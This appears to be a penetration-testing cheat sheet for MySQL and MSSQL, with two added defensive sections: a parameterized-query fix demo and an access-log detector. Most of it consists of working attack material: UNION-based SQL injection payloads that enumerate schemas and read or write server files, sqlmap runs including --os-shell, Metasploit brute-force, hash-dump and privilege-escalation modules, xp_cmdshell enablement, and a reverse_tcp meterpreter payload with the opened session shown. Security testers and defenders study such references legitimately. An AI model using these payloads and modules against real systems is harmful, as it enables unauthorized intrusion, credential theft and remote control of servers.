MySQL
Enumeration
Manual SQL Injection
If a search field is vulnerable to injection, use the techniques below.
# in Burp Suite, watch the response length change to find the column count
' order by [num]-- -
' union select 1,2,3,4,5,6-- -
# any of the numbered columns can be overridden with an expression
' union select (user()),2,3,4,5,6-- -
# list database names from the schema, provided you know how many columns there are
' union select (select group_concat(SCHEMA_NAME SEPARATOR ';') from INFORMATION_SCHEMA.SCHEMATA ),2,3,4,5,6-- -
# list table names for a given database, provided you know how many columns there are
' union select (select group_concat(TABLE_NAME SEPARATOR ';') from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = '<db-name>' ),2,3,4,5,6-- -
# read a file from disk (requires the FILE privilege); base64 keeps binary content intact
' union select (select group_concat("\n\n",TO_BASE64(LOAD_FILE('C:\\inetpub\\wwwroot\\database.php')), "\n\n"),"\n\n",3,4,5,6-- -
# list the privileges of the current database user
' union select (select group_concat(GRANTEE,":",TABLE_CATALOG,":",PRIVILEGE_TYPE,":",IS_GRANTABLE SEPARATOR ';') from INFORMATION_SCHEMA.USER_PRIVILEGES),2,3,4,5,6-- -
# write content to a file on the server (requires the FILE privilege and a writable path)
' union select ("Some text"),2,3,4,5,6 INTO [OUTFILE|DUMPFILE] '<path>'-- -
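The reason the payloads above work is that the application splices the search term into the SQL string. The following added example (not part of the original page) shows the vulnerable concatenation beside the parameterized form that fixes it. It uses Python's built-in sqlite3 as an offline stand-in for MySQL; the table, rows and the `users` table are constructed sample data, and the payload has the same `' union select ...-- -` shape the page shows.

```python
import sqlite3

# Constructed sample data standing in for a MySQL "products" table and a
# separate "users" table that the search feature was never meant to expose.
SAMPLE_PRODUCTS = [
    (1, "widget", "blue"),
    (2, "gadget", "red"),
]
SAMPLE_USERS = [
    (1, "admin", "HASH-PLACEHOLDER"),
]


def make_db():
    """Build an in-memory database (sqlite3 is used only because it ships with Python)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, colour TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def search_vulnerable(conn, term):
    """The defect: the user's input becomes part of the SQL text.

    A single quote closes the string literal, so everything after it is
    parsed as SQL, and a trailing comment discards the original closing quote.
    """
    sql = f"SELECT id, name, colour FROM products WHERE name = '{term}'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, term):
    """The fix: the value travels separately from the statement.

    The driver never parses the term as SQL, so quotes, UNION and comment
    markers are just characters to compare against the name column.
    """
    sql = "SELECT id, name, colour FROM products WHERE name = ?"
    return conn.execute(sql, (term,)).fetchall()


def demo():
    """Run the page's UNION payload against both code paths and return the rows each yields."""
    conn = make_db()
    # Three columns to match the three selected columns, as the page's
    # "order by" probe would have established.
    payload = "' union select id, username, pw_hash from users-- -"
    return {
        "vulnerable": search_vulnerable(conn, payload),
        "parameterized": search_parameterized(conn, payload),
        "normal_search": search_parameterized(conn, "widget"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

The vulnerable path returns the `users` row appended by UNION; the parameterized path returns nothing, because no product is literally named `' union select ...-- -`. The same contrast holds for every payload in the list above: they all depend on the quote terminating the literal, which parameterization removes.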
Sqlmap
Scan for potential SQL injection points with sqlmap
sqlmap -u '<host-ip>?<query>' --cookie="<cookie>"
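Both the manual payloads above and an sqlmap scan leave recognisable traces in the web server's access log. The following added detection example (not part of the original page) parses constructed combined-format log lines, URL-decodes the query string and flags the indicators the page itself uses: UNION SELECT, INFORMATION_SCHEMA, LOAD_FILE, INTO OUTFILE/DUMPFILE, the quoted `order by <n>` column probe, and sqlmap's default User-Agent string. The log lines, IPs and paths are constructed sample data.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access log lines (combined log format). Only line 0 is benign.
LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /search.php?q=widget HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:00:02 +0000] "GET /search.php?q=%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6--%20- HTTP/1.1" 200 733 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:00:03 +0000] "GET /search.php?q=%27%20order%20by%207--%20- HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '10.0.0.12 - - [12/Mar/2024:10:00:04 +0000] "GET /search.php?q=test HTTP/1.1" 200 410 "-" "sqlmap/1.7"',
    '10.0.0.9 - - [12/Mar/2024:10:00:05 +0000] "GET /search.php?q=%27%20union%20select%20(select%20group_concat(SCHEMA_NAME)%20from%20INFORMATION_SCHEMA.SCHEMATA)%2C2--%20- HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

# Combined log format: ip ident user [time] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators matched against the *decoded* query string. Matching the raw,
# percent-encoded text would miss "%20union%20select" because \b does not
# fall between a digit and a letter.
PATTERNS = [
    ("union-select", re.compile(r"\bunion\b[\s/*]+(?:all[\s/*]+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("load_file", re.compile(r"\bload_file\s*\(", re.I)),
    ("into-outfile", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("order-by-probe", re.compile(r"'\s*order\s+by\s+\d+", re.I)),
]


def scan_log(lines):
    """Return (line_index, client_ip, [reasons]) for every line carrying an indicator."""
    findings = []
    for idx, line in enumerate(lines):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a production pipeline should count these
        # Decode once; the application server would have decoded it the same way.
        query = unquote_plus(urlsplit(m.group("target")).query)
        reasons = [name for name, rx in PATTERNS if rx.search(query)]
        if "sqlmap" in m.group("ua").lower():
            reasons.append("sqlmap-user-agent")
        if reasons:
            findings.append((idx, m.group("ip"), reasons))
    return findings


if __name__ == "__main__":
    for idx, ip, reasons in scan_log(LOG_LINES):
        print(f"line {idx} from {ip}: {', '.join(reasons)}")
```

The User-Agent check only catches sqlmap runs that keep the default agent string, so the query-string patterns carry the real weight. Repeated hits from one source with changing column counts (the `order by` and `union select 1,2,...` lines) are the signature of column-count enumeration and are worth alerting on even when each request returns an error.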
Foothold
Sqlmap
If the database is vulnerable to SQL injection, get a shell with sqlmap
sqlmap -u '<host-ip>?<query>' --cookie="<cookie>" --os-shell
Mysqldump
With valid user credentials, a running MySQL server and mysqldump installed, dump the databases
mysqldump -A -u[username] -p[password] [-X] > outputfile
MSSQL
Enumeration
Mssql_ping
By default, MS SQL is installed on TCP port 1433 and UDP port 1434, though newer versions allow for installation on a dynamically allocated port, which can be randomized. Luckily, port 1434 UDP (for which we did not scan) remains the same and can be queried to identify the dynamic port of the SQL server.
msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.33.1/24
RHOSTS => 192.168.33.1/24
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit
Mssql_enum
Dump all server info
use auxiliary/admin/mssql/mssql_enum
Mssql_enum_logins
Obtain all logins for the server
use auxiliary/admin/mssql/mssql_enum_sql_logins
Mssql_schemadump
Dump all schemas from the server
use auxiliary/scanner/mssql/mssql_schemadump
Brute Forcing
Mssql_login
Brute force MSSQL logins
use auxiliary/scanner/mssql/mssql_login
Jtr_mssql_fast
Crack the dumped hashes
use auxiliary/analyze/jtr_mssql_fast
Foothold
Mssqlclient.py
With a username and password, connect using Windows authentication
mssqlclient.py <username>@<host> -windows-auth
Mssql_payload
Send payload through xp_cmdshell.
msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.33.130
RHOST => 192.168.33.130
msf exploit(mssql_payload) > set PASSWORD password123
PASSWORD => password123
msf exploit(mssql_payload) > exploit
...
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1699)
meterpreter >
Lateral Movement
Mssql_hashdump
Dump all password hashes from the server
use auxiliary/scanner/mssql/mssql_hashdump
XP_cmdshell
# check whether the current login holds a server role (returns 1 if it does)
SELECT IS_SRVROLEMEMBER('<role: sysadmin|dbcreator>')
# show the present configuration
sp_configure
# configure xp_cmdshell ('show advanced options' must be enabled first; RECONFIGURE applies the change)
EXEC sp_configure '<option: show advanced options|xp_cmdshell>', <value: 1|0>; RECONFIGURE
Privilege Escalation
Mssql_escalate_dbowner
If the user has the db_owner role, it can be escalated to admin
use auxiliary/admin/mssql/mssql_escalate_dbowner
Mssql_escalate_execute_as
If the user has the IMPERSONATION privilege, it can be escalated to admin
use auxiliary/admin/mssql/mssql_escalate_execute_as